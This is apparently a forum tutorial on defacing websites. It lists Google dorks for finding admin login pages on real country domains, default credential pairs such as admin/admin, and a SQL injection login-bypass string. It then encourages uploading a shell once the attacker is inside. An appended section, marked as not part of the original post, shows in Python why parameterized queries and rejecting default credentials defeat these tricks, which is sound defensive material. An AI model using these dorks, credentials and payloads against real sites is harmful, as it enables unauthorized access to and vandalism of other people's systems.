Deface PoC: default admin login
Hi everyone, this time I'll share how to deface using the default u/p method. "u/p" means username/password, so we log in using the default username and password.
Okay, let's get straight to it.
REQUIREMENTS:
-DORK
-INTERNET
-GOOGLE/CHROME
DORK:
-intitle:"login" /login.php
-intext:"Parent Directory"
-inurl:/admin/upload site:id /admin/uploads site:id /admin/ upload site:uk /admin/uploads site:uk /admin/upload/admin/panel/
-inurl:/login.aspx site:in intext:"members"
-inurl:/login inurl:/admin/dashboard.php
-intext"register" intitle:"login"
-inurl:/admin/images/files
-inurl:/admin/uploads/images
-inurl:/index.php intext:"username"
-intitle:"administrator" inurl:/index.php
-intext:"username" intitle:"login"
-inurl:/index.php intext:"password"
-intitle:"administrator" inurl:/index.php
-intext:"password" intitle:"login"
-inurl:/index.php intext:"username"
-intitle:"panel" inurl:/login.php
-intext:"username" intitle:"panel"
-inurl:/login.php intext:"password"
-intitle:"panel" inurl:/login.php
-intext:"username" intitle:"login"
-inurl:/login.php intext:"password"
-intitle:"login" inurl:/login.php intext:"user" site:in /login.html intitle:"admin" /login.html
-intitle:"admin" site:in /login.html
-intitle:"admin" site:id /login.html
-intitle:"admin" site:uk /login.html intitle:"admin" site:za /loin.html
-intitle:"admin" site:i/login.html
-intitle:"admin" site:pl intext:"login"
-intext:"please login" site:in intext:"login succesfuly" site:in
STEPS:
-First, do the dorking: copy one of the dorks above, paste it into Google and search, then pick one of the sites.
-That will take you straight to the login page.
-After that, log in with the default user and pass listed here:
*Def U/P :
- admin/admin
- admin/admin123
- admin/pass
- administrator/administrator
*SQL login bypass:
- U/P: ' or 1=1 limit 1 -- -+
"For that one, the user and pass are the same"
-Try logging in with these one by one. The part in red is the username and the part in blue is the password.
*If you get into the site's dashboard, it worked.
-Once you are in the dashboard, it's up to you what to do with the site :).
You can upload a shell, etc.
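Seen from the site owner's side, both login tricks above fail against a correctly built login. The following is an added example, not part of the original post: it runs the bypass string from the page against a string-concatenated query and against a parameterized one, and refuses to provision the default pairs listed above. The table layout, function names and sample account are assumptions made for the demo.

```python
import hashlib, hmac, os, sqlite3

# Default pairs listed above; no account should ever be provisioned with them.
DEFAULT_PAIRS = {("admin", "admin"), ("admin", "admin123"),
                 ("admin", "pass"), ("administrator", "administrator")}
PAYLOAD = "' or 1=1 limit 1 -- -+"  # bypass string quoted on the page

def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def create_user(db, username, password):
    """Reject known default pairs, then store a salted PBKDF2 hash."""
    if (username.lower(), password) in DEFAULT_PAIRS:
        raise ValueError("default credential pair rejected")
    salt = os.urandom(16)
    db.execute("INSERT INTO users VALUES (?, ?, ?)",
               (username, salt, _hash(password, salt)))

def make_db():
    """In-memory table holding one constructed sample account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, salt BLOB, pw BLOB)")
    create_user(db, "admin", "constructed-Sample-9f!")
    return db

def login_vulnerable(db, username, password):
    """'Before' pattern, query-building flaw only: input is pasted into the SQL,
    so a quote ends the string literal and the rest is parsed as SQL."""
    sql = ("SELECT 1 FROM users WHERE username = '%s' AND pw = '%s'"
           % (username, password))
    return db.execute(sql).fetchone() is not None

def login_hardened(db, username, password):
    """Bound parameter for the lookup; password verified against the hash."""
    row = db.execute("SELECT salt, pw FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[1], _hash(password, row[0]))

if __name__ == "__main__":
    db = make_db()
    print("vulnerable accepts payload:", login_vulnerable(db, PAYLOAD, PAYLOAD))
    print("hardened accepts payload:  ", login_hardened(db, PAYLOAD, PAYLOAD))
```

With the bound parameter, the payload is compared as a literal username that does not exist, so the login is refused.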
Closing words
That's all for now...
BYE...